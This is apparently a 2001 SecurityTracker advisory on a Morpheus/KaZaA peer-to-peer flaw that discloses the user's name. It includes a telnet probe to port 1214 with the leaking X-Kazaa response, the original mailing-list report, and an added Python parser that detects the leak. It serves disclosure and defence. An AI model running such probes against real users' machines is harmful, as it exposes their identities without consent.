Morpheus Peer-to-Peer Software Discloses User Name Information to Remote Users
SecurityTracker Alert ID: 1002311
SecurityTracker URL: http://securitytracker.com/id/1002311
CVE Reference:
GENERIC-MAP-NOMATCH
Date: Sep 1 2001
Impact:
Disclosure of user information
Exploit Included: Yes
Description:
An information disclosure vulnerability was reported in Morpheus. The product discloses the user's name to remote users.
A remote user can connect to the Morpheus port and query the web daemon to determine the user's name.
A demonstration exploit transcript is provided:
foobar2:~# ping localhost | telnet morpheus.users.ip.address 1214
Trying morpheus.users.ip.address...
Connected to morpheus.users.ip.address.
Escape character is '^]'.
HTTP/1.0 501 Not Implemented
X-Kazaa-Username: {USER NAME HERE}
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214
Connection closed by foreign host.
foobar2:~#
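As an added example (not code from the advisory, from Morpheus or from KaZaA), the following Python parses a response of the kind shown in the transcript and reports which X-Kazaa headers disclose identifying details, so a response captured from your own client, a proxy log or an IDS can be checked for this leak. The sample response is constructed from the transcript above, with the placeholder user name kept.

```python
# Added example, not code from the SecurityTracker advisory or from Morpheus/KaZaA.
# Parses a raw HTTP response like the one in the transcript and reports which
# X-Kazaa-* headers disclose identifying details about the local user or host.
import re
from typing import Dict, List, Optional, Tuple

# Header names from the advisory transcript that identify the user or host.
IDENTIFYING_HEADERS = ("x-kazaa-username", "x-kazaa-ip", "x-kazaa-supernodeip")

# Constructed sample: the 501 response shown in the advisory, placeholder name kept.
SAMPLE_RESPONSE = (
    "HTTP/1.0 501 Not Implemented\r\n"
    "X-Kazaa-Username: {USER NAME HERE}\r\n"
    "X-Kazaa-Network: MusicCity\r\n"
    "X-Kazaa-IP: morpheus.users.ip.address:1214\r\n"
    "X-Kazaa-SupernodeIP: 130.74.237.54:1214\r\n"
    "\r\n"
)


def split_response(raw: str) -> Tuple[Optional[int], Dict[str, str]]:
    """Return (status_code, headers) from a raw response; tolerates LF or CRLF."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = head.splitlines()
    status = None
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0]) if lines else None
    if m:
        status = int(m.group(1))
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # ignore malformed header lines
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def disclosed_fields(raw: str) -> List[str]:
    """Identifying X-Kazaa headers present in the response, in a fixed order."""
    _, headers = split_response(raw)
    return [h for h in IDENTIFYING_HEADERS if h in headers]


def leaks_on_error(raw: str) -> bool:
    """True when an error response (4xx/5xx) still carries identifying headers,
    which is the behaviour the advisory describes (the 501 reply leaks the name)."""
    status, _ = split_response(raw)
    return status is not None and status >= 400 and bool(disclosed_fields(raw))
```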
Impact:
A remote user can determine the Morpheus username.
Solution:
No solution was available at the time of this entry.
Vendor URL: www.musiccity.com/
Cause:
Exception handling error
Underlying OS:
Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)
Message History:
None.
Source Message Contents
Date: Tue, 28 Aug 2001 15:34:03 -0400
Subject: KaZaA / Morpheus Exploit??? (At least a way to get username and such)
Using FreeBSD 4.3 I tried the following...
foobar2:~# ping localhost | telnet morpheus.users.ip.address 1214
Trying morpheus.users.ip.address...
Connected to morpheus.users.ip.address.
Escape character is '^]'.
HTTP/1.0 501 Not Implemented
X-Kazaa-Username: {USER NAME HERE}
X-Kazaa-Network: MusicCity
X-Kazaa-IP: morpheus.users.ip.address:1214
X-Kazaa-SupernodeIP: 130.74.237.54:1214
Connection closed by foreign host.
foobar2:~#
Now I've tried this under W2K's DOS and it does not produce the
same results... (It just times out)
Is this of any interest???
Jesse